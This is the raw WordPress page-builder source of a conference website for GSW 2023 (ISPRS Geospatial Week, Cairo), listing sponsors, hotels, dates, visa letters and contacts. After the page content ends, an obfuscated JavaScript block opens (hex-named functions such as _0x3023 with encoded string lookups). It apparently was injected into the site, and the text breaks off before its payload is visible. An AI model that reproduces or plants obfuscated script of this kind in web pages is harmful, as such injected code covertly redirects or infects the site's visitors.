width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 